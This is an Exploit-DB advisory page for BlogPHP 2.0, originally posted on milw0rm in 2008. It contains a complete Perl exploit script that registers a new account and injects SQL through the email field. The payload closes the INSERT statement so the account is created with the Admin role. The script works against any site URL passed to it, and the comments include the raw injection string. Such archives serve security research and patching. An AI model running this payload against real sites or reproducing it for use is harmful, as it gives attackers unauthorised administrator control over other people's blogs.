BlogPHP 2.0 - Privilege Escalation / SQL Injection

EDB-ID:

5909

Author:

Cod3rZ

Type:

webapps

Platform:

PHP

Published:

2008-06-23

#!/usr/bin/perl
# BlogPHP 2.0 Remote Privilege Escalation Exploit
# Author : Cod3rZ
# Site   : http://cod3rz.helloweb.eu
# Site   : http://devilsnight.altervista.org
# Cuz We Back Rude This Time
#
# Privilege Escalation
# Send a request to http://127.0.0.1/BlogPHPv2/index.php?act=register2 with:
# username=[yourusername]&password=[yourpass]&email=[yourmail]','Admin','','','','','','','','','','','','')/*
#
# There are other bugs, find them yourself
#
# Usage: perl bp.pl <site> <user> <pass> <mail>

system('cls');
#system('clear');

use LWP::UserAgent;
use HTTP::Request::Common;

$site = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$mail = $ARGV[3];

 print " -------------------------------------------------\n";
 print " BlogPHP 2.0 Remote Privilege Escalation Exploit  \n";
 print " Powered by Cod3rZ                                \n";
 print " http://cod3rz.helloweb.eu                        \n";
 print " -------------------------------------------------\n";

sub usage {
	print " Usage: perl bp.pl <site> <user> <pass> <mail>    \n";
	print " -------------------------------------------------\n";
}
 if(!$mail) { &usage; }
 else {	
	if ($site !~ /http:\/\//) { $site = "http://".$site; }

	print " Site: $site                                      \n";
	print " User: $user                                      \n";
	print " Pass: $pass                                      \n";
	print " Mail: $mail                                      \n";
	print " -------------------------------------------------\n";
	print " Please Wait                                      \n";
	print " -------------------------------------------------\n";

	$ua = LWP::UserAgent->new;
	 $lwp = $ua->request(POST $site.'index.php?act=register2', 
	  [ username => $user, password => $pass, email    => $mail."','Admin','','','','','','','','','','','','')/*" ]);
	
	if($lwp->content =~ /Your now registered and logged in/) {
		print " Done. Now you're admin                           \n";
		print " -------------------------------------------------\n";
	}
	else {
		print " Failed.                                          \n";
		print " -------------------------------------------------\n";
	}

}

# milw0rm.com [2008-06-23]